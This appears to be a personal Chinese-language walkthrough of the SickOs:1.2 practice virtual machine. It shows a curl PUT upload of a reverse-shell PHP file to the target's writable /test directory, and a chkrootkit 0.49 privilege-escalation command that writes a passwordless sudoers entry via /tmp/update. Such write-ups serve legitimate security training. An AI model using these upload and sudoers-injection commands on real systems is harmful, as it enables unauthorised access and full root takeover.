靶场练习 - SickOs:1.2

靶场搭建

下载虚拟机,导入到虚拟机,网卡调成NAT模式直接就能用

IP:192.168.174.130

渗透过程

信息初收集

22/tcp open  ssh
80/tcp open  http

明显是web,扫了一下路径,发现test外没有任何东西了,而且这个文件夹里啥都没有

发现可以使用PUT上传文件

于是上传反弹shell:curl --upload-file shell.php -v --url http://192.168.174.130/test/shell.php -0 --http1.0

目标机器可能设置了出口限制,反弹端口要设置为443才可以拿到shell!

监听,拿到shell。

提权

没有密码,低权限账号,目标机器一个john用户

find / -type f -perm /4000 没有发现有可以利用的脚本

查看定时任务,发现有一个chkrootkit,查看版本信息dpkg -l | grep chkrootkit

有一个漏洞可以利用,Chkrootkit 0.49 - Local Privilege Escalation

具体漏洞信息:https://www.exploit-db.com/exploits/33899

echo 'echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

这样等待一天后机器运行chkrootkit,就有了sudo权限,而且不需要密码,直接sudo su就能拿到root权限了

小结

get了新的提权方式。

提权方式还有很多种,需要进行总结。

评论区
头像
文章目录